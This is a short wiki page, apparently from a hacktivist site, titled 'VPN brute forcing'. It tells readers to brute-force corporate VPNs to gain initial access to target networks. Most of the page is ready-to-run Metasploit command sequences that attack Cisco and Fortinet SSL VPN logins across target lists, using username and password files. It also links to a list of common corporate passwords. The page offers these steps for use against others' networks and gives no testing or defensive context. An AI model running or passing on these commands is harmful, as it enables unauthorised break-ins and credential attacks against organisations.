VPN brute forcing

From Enlace Hacktivista

Revision as of 16:58, 2 August 2023 by Booda (talk | contribs)

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Jump to navigation Jump to search

Brute force common corporate VPNs to gain initial access to target networks. Install metasploit and then see Initial access TTPs for mass scanning ports.

CISCO

sudo systemctl start postgresql
msfdb init
msfconsole
use auxiliary/scanner/http/cisco_ssl_vpn
set RHOSTS file:/home/targets_443.txt
set RPORT 443
set USER_FILE /home/users.txt
set PASS_FILE /home/pass.txt
set threads 10
run

FORTI SSL VPN

sudo systemctl start postgresql
msfdb init
msfconsole
use auxiliary/scanner/http/fortinet_ssl_vpn
set RHOSTS file:/home/targets_10443.txt
set RPORT 10443
set USER_FILE /home/users.txt
set PASS_FILE /home/pass.txt
set threads 10
run

pass.txt: https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst

Retrieved from "https://enlacehacktivista.org/index.php?title=VPN_brute_forcing&oldid=1357"